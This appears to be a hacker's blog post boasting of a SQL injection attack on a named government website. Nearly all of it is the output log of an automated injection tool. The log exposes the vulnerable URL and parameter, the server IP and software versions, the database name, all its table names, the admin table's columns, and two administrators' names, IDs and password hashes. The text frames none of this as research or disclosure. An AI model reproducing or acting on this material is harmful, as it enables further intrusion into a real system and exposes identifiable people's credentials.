found by : cobra akka topeng hitam
inject by : gilang akka gilang-info
Analyzing http://www.presidentofpakistan.gov.pk/index.php?lang=en&opc=3&sel=3&id=%27330
Host IP: 72.32.250.192
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
Keyword Found: sign
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
Can't find db server type! But maybe there be some chances! [-o<
Selected Column Count is 13
Tying to find string column for MySQL
Valid String Column is 3
DB Server: MySQL
Target Vulnerable :D
Current DB: p0fPakistan
Count(table_name) of information_schema.tables Where table_schema=0x70306650616B697374616E is 48
Tables found: InternationalSecurityAgreementsTSource,InternationalTradeAgreementsTSource,RecoveringFromTheFloodsTSource,atTSource,audiosFilesTSource,basicFactsTSource,benazirBhuttoTSource,bilateral,blogCom,blogEntriesTSource,chartTsource,cms_user,counterNarcoticsTSource,demographicsTSource,easeOfDoingBusinessTSource,economyTSource,energyCrisisTSource,ensuringSecurityTSource,eventsTSource,expandingHealthCareTSource,gabinetTSource,governmentTSource,imagesFilesTSource,increasingEconomicProsperityTSource,multimediaAudiosTSource,multimediaImagesTSource,multimediaVideosTSource,newsTSource,pakistanTourismTSource,presidentInActionHeadersTSource,presidentRoleTSource,presidentTSource,presidentsTSource,pressReleasesTSource,preventingWaterCrisisTSource,reasonsLinksTSource,reasonsTSource,reducingPovertyTSource,sharedResponsibilityTSource,speechFileTSource,speechesTSource,strengtheningDemocracy,thePersonBehindThePoliticsTSource,tradeLinksTSource,travelInformationTSource,travelLinksTSource,tripsTSource,videosFilesTSource
Count(column_name) of information_schema.columns Where table_schema=0x70306650616B697374616E AND table_name=0x636D735F75736572 is 6
Columns found: idUser,Name,emailUser,password,position,userProfile
Finding admin page: http://www.presidentofpakistan.gov.pk/
Job Finished
Count(*) of p0fPakistan.cms_user is 2
Data Found: Name=Bilal
Data Found: idUser=13
Data Found: password=38a1c45f540a249da0f1968727dcc5b83a3d01c2
Data Found: Name=Mariam
Data Found: idUser=14
Data Found: password=cfe77a67c7e54f37ef53ecd3a1665bef4f1a5870
2:41 AM
gilang
Posted in: